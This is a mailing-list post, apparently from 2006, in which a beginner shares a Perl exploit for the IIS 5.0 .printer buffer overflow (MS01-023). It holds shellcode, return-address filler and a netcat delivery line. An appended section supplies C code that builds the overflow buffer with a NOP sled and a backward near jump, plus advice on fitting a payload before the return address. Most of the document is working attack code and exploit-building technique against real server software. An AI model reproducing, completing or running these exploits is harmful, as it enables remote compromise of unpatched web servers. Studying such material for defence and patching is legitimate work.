Metasploit mailing list archives

Subject: iis50_printer_overflow
From: sonixxfx at gmail.com (Sonixxfx)
Date: Thu, 2 Mar 2006 21:49:11 +0100

Hi,

I am trying to write an exploit for the "iis50_printer_overflow"
vulnerability (http://www.osvdb.org/3323,
http://www.microsoft.com/technet/security/bulletin/MS01-023.mspx,
http://seclists.org/lists/bugtraq/2001/May/0005.html,
http://milw0rm.com/metasploit.php?id=27), but I have run into a problem. It is
the first time I am doing this and I cannot write in C. I have read the
excellent part Vinnie Liu wrote about writing exploits, but I cannot find
enough information in it to solve my problem.

The problem seems to be that I have little space available after the return
address for the payload. I believe there are about 240 bytes available. So my
question is: how can I make use of both the space available after the return
address and the space before it? There are 268 bytes available before the
return address.
I have made use of a "call esp" opcode because I saw my attack string in esp
in OllyDbg. I saw an exploit online that makes use of the same vulnerability,
but it seems to be using a "call ebx" opcode, so I used a "call ebx" opcode
too, but also without result.

Below is the Perl script that I have written. I have determined the bad
characters, decoded, etc., but when I try this with OllyDbg nothing seems to
change in Olly and inetinfo keeps running.

Please keep in mind that I am a n00b on this subject.

This is my Perl program:

use strict;
use warnings;

# Payload: a jmp/call/pop stub that finds its own address in memory,
# followed by alphanumeric-encoded shellcode and its decoder.
my $payload =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56".
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58".
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44".
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d".
"\x4e\x4f\x4a\x4e\x46\x34\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x44".
"\x4e\x33\x4b\x38\x4e\x37\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48".
"\x4f\x44\x4a\x51\x4b\x48\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54".
"\x4b\x58\x46\x53\x4b\x38\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39".
"\x4e\x4a\x46\x58\x42\x4c\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30".
"\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46".
"\x4b\x38\x4e\x50\x4b\x34\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e".
"\x4b\x58\x4e\x41\x4b\x38\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42".
"\x46\x50\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53".
"\x45\x38\x42\x4c\x4a\x47\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x58".
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50".
"\x4b\x38\x42\x58\x42\x4b\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36".
"\x4e\x33\x4f\x45\x41\x33\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f".
"\x43\x58\x42\x4c\x4b\x37\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50".
"\x4f\x55\x4a\x36\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f".
"\x47\x4e\x49\x36\x42\x37\x43\x36\x4f\x56\x50\x56\x48\x36\x49\x36".
"\x47\x46\x42\x30\x5a";

# Request: 268 bytes of filler in the Host: header reach the saved return
# address, then the 4-byte return address (little-endian), then the payload.
my $string = "GET /";
$string .= "NULL.printer HTTP/1.0\r\n";
$string .= "Host: ";
$string .= "A" x 268;                  # filler up to the saved return address
$string .= "\xf3\x45\x2c\x73";         # return address 0x732c45f3, little-endian
$string .= $payload;                   # bytes that follow the return address
$string .= "\r\n\r\n";

# Pipe the request through netcat. binmode() matters on Windows: a text-mode
# pipe translates every "\n" into "\r\n", which mangles the request and any
# payload byte equal to 0x0a.
open(my $nc, '|-', 'nc.exe 127.0.0.1 80')
    or die "cannot run nc.exe: $!";
binmode($nc);
print $nc $string;
close($nc);

I hope I have included enough information. I am a bit tired at the moment.

By the way, nice looking man this morning on your website, Metasploit ;)

Thanks

Regards,

Ben
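The question above asks how to use both the 268 bytes before the saved return address and the short region after it. One standard answer is to put only a small backward jump after the return address and keep the real payload in the larger region in front of it. The following C program is an added example written for this page; it is not code from the original post, from the Metasploit module, or from any published exploit. It assumes the layout the post describes: 268 bytes of filler, a 4-byte return address pointing at a "call esp"-style gadget, and execution starting at the first byte after the return address. It further assumes that the 268-byte region is still intact in memory and sits immediately before the return address when the stub runs, and it reuses the post's return address value 0x732c45f3 only as a placeholder. The payload (eight int3 bytes) and the bad-character list (NUL, CR, LF, the minimum for a value carried in an HTTP header) are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Assumed buffer layout (from the numbers in the post, not verified here):
 *   buf[0..267]    268 bytes before the saved return address
 *   buf[268..271]  return address, little-endian
 *   buf[272..]     first bytes executed after the "call esp" gadget
 *
 * A 5-byte near jmp (E9 rel32) is placed at buf[272] and jumps back to
 * buf[0]. The real payload sits at the END of the 268-byte region, with
 * NOPs in front, so a small error in the landing address still slides
 * into it. A short jmp (EB rel8) cannot be used: it only reaches 128
 * bytes back, and the stub needs to travel 277.
 */

#define PRE_LEN 268u   /* bytes before the saved return address */
#define RET_LEN 4u
#define JMP_LEN 5u     /* E9 + rel32 */

/* Displacement for a near jmp located at jmp_off whose target is
 * target_off; x86 measures it from the end of the jmp instruction. */
int32_t jmp_rel32(uint32_t jmp_off, uint32_t target_off)
{
    return (int32_t)target_off - (int32_t)(jmp_off + JMP_LEN);
}

/* Write an E9 near jmp with the given displacement, little-endian. */
void emit_jmp_rel32(uint8_t *out, int32_t rel)
{
    uint32_t u = (uint32_t)rel;
    out[0] = 0xE9;
    out[1] = (uint8_t)(u & 0xFF);
    out[2] = (uint8_t)((u >> 8) & 0xFF);
    out[3] = (uint8_t)((u >> 16) & 0xFF);
    out[4] = (uint8_t)((u >> 24) & 0xFF);
}

/* Index of the first byte of buf found in bad[], or -1 if none. */
long find_bad_char(const uint8_t *buf, size_t len,
                   const uint8_t *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Assemble [NOP pad][payload][ret][jmp back to buf[0]].
 * Returns the total length, or 0 if the payload does not fit. */
size_t build_overflow(uint8_t *out, size_t cap, const uint8_t *payload,
                      size_t payload_len, uint32_t ret_addr)
{
    size_t total = PRE_LEN + RET_LEN + JMP_LEN;
    if (payload_len > PRE_LEN || cap < total)
        return 0;
    size_t pad = PRE_LEN - payload_len;
    memset(out, 0x90, pad);                    /* NOP sled */
    memcpy(out + pad, payload, payload_len);   /* payload ends at buf[267] */
    out[PRE_LEN + 0] = (uint8_t)(ret_addr & 0xFF);         /* little-endian */
    out[PRE_LEN + 1] = (uint8_t)((ret_addr >> 8) & 0xFF);
    out[PRE_LEN + 2] = (uint8_t)((ret_addr >> 16) & 0xFF);
    out[PRE_LEN + 3] = (uint8_t)((ret_addr >> 24) & 0xFF);
    /* the stub at buf[272] jumps to buf[0] */
    emit_jmp_rel32(out + PRE_LEN + RET_LEN, jmp_rel32(PRE_LEN + RET_LEN, 0));
    return total;
}

int main(void)
{
    /* Constructed stand-in payload: int3 breakpoints, so a debugger stops
     * exactly where the backward jump lands. */
    static const uint8_t payload[8] = {0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC};
    static const uint8_t bad[] = {0x00, 0x0A, 0x0D};   /* constructed minimum list */
    uint8_t buf[512];
    size_t n = build_overflow(buf, sizeof buf, payload, sizeof payload, 0x732c45f3u);
    if (n == 0) {
        fputs("payload does not fit in the pre-return region\n", stderr);
        return 1;
    }
    long bc = find_bad_char(buf, n, bad, sizeof bad);
    printf("%zu bytes total, jmp rel32 = %ld (0x%08x), bad char at %ld\n",
           n, (long)jmp_rel32(PRE_LEN + RET_LEN, 0),
           (unsigned)jmp_rel32(PRE_LEN + RET_LEN, 0), bc);
    return bc == -1 ? 0 : 1;
}
```

Two things a practitioner checks before sending this: the stub bytes themselves (E9 EB FE FF FF for a 277-byte backward jump) have to pass the same bad-character test as the payload, which is why the check runs over the whole buffer; and the assumption that the region in front of the return address survives until the stub runs has to be confirmed in the debugger, which the int3 placeholder makes visible. If the function that overflows also scribbles over that region after the copy, the jump lands in garbage and a different trick (for example, a staged payload that reads more bytes from the socket) is needed instead.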